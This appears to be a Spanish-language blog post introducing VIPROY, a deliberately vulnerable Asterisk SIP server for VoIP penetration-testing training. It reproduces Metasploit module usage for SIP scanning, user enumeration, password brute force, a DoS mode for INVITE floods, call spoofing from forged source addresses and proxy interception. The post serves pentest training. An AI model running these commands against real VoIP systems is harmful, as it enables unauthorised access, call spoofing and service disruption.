VIPROY - VoIP Penetration Testing Kit


¿Qué es VIPROY?

Es un servidor SIP (Session Initiation Protocol) basado en Asterisk, configurado y preparado para el entrenamiento de los Pentester, es decir, un servidor vulnerable preparado para trabajar y soportar comunicaciones por VoIP. Esta pensado para conseguir averiguar el password (cracking) y obtener acceso a los buzones de voz.
SIP es el protocolo de señalización que hace posible el establecimiento de las llamadas de voz por Internet, es decir por IP.
Este Kit se ha desarrollado para mejorar las habilidades de los Pentester en los entornos de VoIP, en especial las pruebas de seguridad que se realizan para los procesos de autenticación. 

VIPROY permite poner a prueba el sistema de autenticación, proporcionando de este modo un entrenamiento muy interesante para aquellos profesionales (Pentester) que se enfrenten a un test de penetración con infraestructura de VoIP. 

Las pruebas o test que se incluyen en el Kit, son:

Options tester: manipulación de las opciones de comunicación en la VoIP, con el protoclo SIP se puede indicar el codec que se utiliza en la comunicación, así como el puerto de conexión. Se puede poner a prueba las opciones.

Brute force: Ataques de fuerza bruta en el proceso de identificación de cada teléfono/ usuario.

Enumerator: Se puede poner en practica la técnica de conseguir información sobre los usaurios y/o terminales de VoIP, que tiene el servidor registrados.

Invite tester: pruebas en el proceso de llamada de los usuarios de VoIP.

Trust analyzer, Proxy/Registration tester: evaluar la seguridad del proceso de registro y la comunicación a través de proxy.

Como se puede apreciar, VIPROY ofrece un entorno ideal para el entrenamiento de los Pentester orientados a las infraestructuras con VoIP.

PREPARANDO EL ESCENARIO

El KIT consiste en un máquina virtual preparada y lista para su funcionamiento; se puede descargar en siguiente enlace:

MD5 Hash of VulnVoIP.7z: 1411bc06403307d5ca2ecae47181972a
VMware: vulnvoip.7z
Las características principales son: x86, VMWare. 512MB RAM, NAT network.

Por supuesto, para usar correctamente el entorno, se debe de conocer como estan configurados los diferentes módulos del Servidor Asterisk. 


A continuación, copio la información que la página oficial proporciona:

Global Settings

setg CHOST 192.168.1.99 #Local Host
setg CPORT 5099 #Local Port
setg RHOSTS 192.168.1.1-254 #Target Network
setg RHOST 192.168.1.201 #Target Host

Basic Usage of OPTIONS Module

use auxiliary/scanner/sip/vsipoptions
show options
set THREADS 255
run

Basic Usage of REGISTER Module

use auxiliary/scanner/sip/vsipregister
show options
run

set LOGIN true
set USERNAME 101
set PASSWORD s3cur3
run

Basic Usage of INVITE Module

use auxiliary/scanner/sip/vsipinvite
set FROM 2000
set TO 1000
run

set LOGIN true
set FROM 102
set USERNAME 102
set PASSWORD letmein123
run

set DOS_MODE true
set NUMERIC_USERS true
set NUMERIC_MIN 200
set NUMERIC_MAX 205
run

Basic Usage of ENUMERATOR Module

use auxiliary/scanner/sip/vsipenumerator
show options
unset USERNAME
set USER_FILE /tmp/files/users2
set VERBOSE false
set METHOD SUBSCRIBE
run

unset USER_FILE
set METHOD SUBSCRIBE
set NUMERIC_USERS true
set NUMERIC_MAX 2300
run

set METHOD REGISTER
run

Basic Usage of BRUTE FORCE Module

use auxiliary/scanner/sip/vsipbruteforce
show options
set RHOST 192.168.1.201
set USERNAME 2000
set PASS_FILE /tmp/files/passwords
set VERBOSE false
run

unset USERNAME
set USER_FILE /tmp/files/users2
run

unset USER_FILE
set NUMERIC_USERS true
set NUMERIC_MAX 500
run

Basic Usage of Trust Analyzer Module

use auxiliary/scanner/sip/vsiptrust
show options
set SRC_RHOSTS 192.168.1.200-210
set SRC_RPORTS 5060
set SIP_SERVER 192.168.1.201
set INTERFACE eth0
set TO 101
run

show options
set ACTION CALL
set SRC_RHOSTS 192.168.1.202
set FROM James Bond
run

Basic Usage of SIP Proxy Module

use auxiliary/scanner/sip/vsipproxy
show options
set PRXCLT_PORT 5060
set PRXCLT_IP 192.168.1.99
set PRXSRV_PORT 5089
set PRXSRV_IP 192.168.1.99
set CLIENT_IP 192.168.1.120
set CLIENT_PORT 5060
set SERVER_IP 192.168.1.201
set SERVER_PORT 5060
set CONF_FILE /tmp/sipproxy_replace.txt
set LOG true
set VERBOSE false
run



EJEMPLO DE USO: DEMO

A continuación os dejo un vídeo de demostración con #Metasploit SIP Module,  donde se puede ver algunos ataques realizados dentro de este entorno vulnerable, por poner un ejemplo: SIP Service Discovery, ejecutando un REGISTER sin credenciales.



Para más información:

0 comentarios:

Publicar un comentario